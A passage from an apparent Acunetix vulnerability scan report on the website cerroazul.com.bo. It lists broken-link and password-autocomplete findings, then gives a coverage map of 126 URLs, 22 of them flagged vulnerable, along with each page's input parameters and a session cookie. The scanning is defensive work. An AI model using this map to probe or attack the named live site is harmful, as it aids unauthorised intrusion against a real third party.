Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/minilistasfcl.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/minilistasfcl.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/spritefcl.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/spritefcl.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/spritefcl_class.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/spritefcl_class.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/listado_empresas.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /listado_empresas.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/www.facebook.com/BarracaCerroAzul
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers
GET /www.facebook.com/BarracaCerroAzul HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Password type input with auto-complete enabled
Severity: Informational
Type: Informational
Reported by module: Crawler
Description
When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.
Impact
Possible sensitive information disclosure
Recommendation
The password auto-complete should be disabled in sensitive applications. To disable auto-complete, you may use a code similar to:
Affected items
/empresa.php
Details
Password type input named password from form with ID form-homepage-contact with action empresa.php has autocomplete enabled.
Request headers
GET /empresa.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/sesion.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/listado.php
Details
Password type input named password from form with ID form-homepage-contact with action listado.php has autocomplete enabled.
Request headers
GET /listado.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/contacto.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/privacidad.php
Details
Password type input named password from form with ID form-homepage-contact with action privacidad.php has autocomplete enabled.
Request headers
GET /privacidad.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/sesion.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Password type input named password from form with ID form-homepage-contact with action sesion.php has autocomplete enabled.
Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Password type input named password from form with ID form-homepage-contact with action suscribirse.php has autocomplete enabled.
Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Scanned items (coverage report)
Scanned 126 URLs. Found 22 vulnerable.
URL: http://www.cerroazul.com.bo/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common.php
Vulnerabilities has been identified for this URL
4 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
Input scheme 2
Input name | Input type
mensaje | URL encoded GET
name | URL encoded GET
phone | URL encoded GET
URL: http://www.cerroazul.com.bo/listado_empresas.php
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/mapa.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
URL: http://www.cerroazul.com.bo/sesion.php
Vulnerabilities has been identified for this URL
6 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
password | URL encoded POST
phone | URL encoded POST
Input scheme 2
Input name | Input type
phone | URL encoded POST
Input scheme 3
Input name | Input type
password | URL encoded POST
phone | URL encoded POST
usuario | URL encoded POST
URL: http://www.cerroazul.com.bo/about.php
Vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
URL: http://www.cerroazul.com.bo/index.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
URL: http://www.cerroazul.com.bo/contacto.php
Vulnerabilities has been identified for this URL
5 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
Input scheme 2
Input name | Input type
correo | URL encoded GET
mensaje | URL encoded GET
name | URL encoded GET
phone | URL encoded GET
URL: http://www.cerroazul.com.bo/comentario.php
Vulnerabilities has been identified for this URL
3 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
Input scheme 2
Input name | Input type
comentario | URL encoded GET
name | URL encoded GET
URL: http://www.cerroazul.com.bo/common/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/reset.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/boton.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/styles.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menuUni.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/basefcl.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/spritefcl.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/base_header.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/nivo-slider.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/minilistasfcl.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/spritefcl_class.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/accordionmenu.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/minilistas_fcl.css
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/style.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/settings.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/css-family.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menuuni.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/style2.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menuicon.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/catalogo.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/listas_fcl.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/img
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/basic.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/galleriffic-3.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/menu_acor.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/css/ie-css3.htc
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/empresas/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/uploads/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/thumb/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/banners/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/images_menu/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/gallery_bottom/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/images/site
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/accordionmenu.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_index.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/banner/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.pack.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.easing.1.3.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.cssAnimate.mini.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.touchwipe.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.mousewheel.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.themepunch.services.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/mapa.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/gmaps.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/login.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.md5.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_contacto.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/comentario.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_cata.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/parametros.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/registrarse.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.history.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.galleriffic.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/jquery.opacityrollover.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_descripcion.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/actualizar_visita_cata.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/cargar_grupo.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/buscar.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/ubicaciones.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/js/search.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.all.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.theme.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.autocomplete.css
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.4.2.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.core.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.widget.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.position.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.autocomplete.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.min.js
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/site
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/site/common
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/imagenes
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/layout_miarroba
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/layout_miarroba/sprites
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/empresa/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/empresa/get_empresas.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id_dpto | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/search/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/search/get-datos.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id_dpto | URL encoded GET
parametro | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/search/get_paginador2.php
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/search/get_datespag2.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
vf_param | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/catalogo/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/catalogo/get_datos_descripcion.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id_cata | URL encoded GET
id_empre | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/catalogo/actualizar_cata.php
No vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id_cata | URL encoded GET
id_empre | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/contacto/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/contacto/get-datos.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id_empre | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/contacto/enviar_datos.php
No vulnerabilities has been identified for this URL
5 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
correo | URL encoded GET
id_empre | URL encoded GET
mensaje | URL encoded GET
nombre | URL encoded GET
telefono | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/comentario/get_datos.php
Vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id_empre | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/get-paginador.php
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common/php/comentario/get-datespag.php
No vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
vf_param | URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/insertar_come.php
No vulnerabilities has been identified for this URL
4 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
descripcion | URL encoded GET
id_empre | URL encoded GET
id_padre | URL encoded GET
nombre | URL encoded GET
URL: http://www.cerroazul.com.bo/catalogo.php
Vulnerabilities has been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
URL: http://www.cerroazul.com.bo/suscribirse.php
Vulnerabilities has been identified for this URL
6 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
password | URL encoded POST
txt_usuario | URL encoded POST
Input scheme 2
Input name | Input type
name | URL encoded POST
password | URL encoded POST
phone | URL encoded POST
txt_nombre | URL encoded POST
URL: http://www.cerroazul.com.bo/descripcion.php
No vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
id_cata | URL encoded GET
URL: http://www.cerroazul.com.bo/catalogo_grupo.php
Vulnerabilities has been identified for this URL
3 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
id | URL encoded GET
id_fami | URL encoded GET
id_grupo | URL encoded GET
URL: http://www.cerroazul.com.bo/www.facebook.com
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/www.facebook.com/BarracaCerroAzul
Vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/empresa.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
password | URL encoded POST
txt_usuario | URL encoded POST
URL: http://www.cerroazul.com.bo/ubicacion.php
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/privacidad.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
password | URL encoded POST
txt_usuario | URL encoded POST
URL: http://www.cerroazul.com.bo/listado.php
Vulnerabilities has been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name | Input type
password | URL encoded POST
txt_nombre | URL encoded POST
URL: http://www.cerroazul.com.bo/undefined
No vulnerabilities has been identified for this URL
No input(s) found for this URL